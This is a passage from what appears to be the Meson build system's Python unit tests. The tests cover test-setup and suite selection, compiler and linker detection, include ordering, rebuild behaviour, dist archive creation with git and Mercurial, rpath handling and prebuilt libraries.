def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
